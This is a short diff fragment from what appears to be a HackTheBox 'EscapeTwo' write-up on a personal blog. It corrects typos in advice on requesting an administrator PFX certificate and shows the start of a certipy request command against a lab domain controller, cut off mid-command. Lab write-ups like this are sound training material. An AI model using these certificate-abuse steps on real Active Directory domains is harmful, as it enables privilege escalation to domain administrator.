cesar-guillen/cesar-guillen.github.io/_posts/2025-07-30-EscapeTwo.md

 [*] Successfully updated 'DunderMifflinAuthentication
 ```

 Then we can request the administrator pfx with the following command.
-If the command fails I recommend adding more flag like the subject.
-In the case that we get an error saying that the SIDs do not match I recommend simply removing the SID flag entirely as I still worked without it.
+If the command fails I recommend adding more flags like the subject.
+In the case that we get an error saying that the SIDs do not match I recommend simply removing the SID flag entirely as it still worked without it.

 ```
 certipy req  -u 'ca_svc@sequel.htb' -p 'password'  -dc-ip '10.10.11.51' \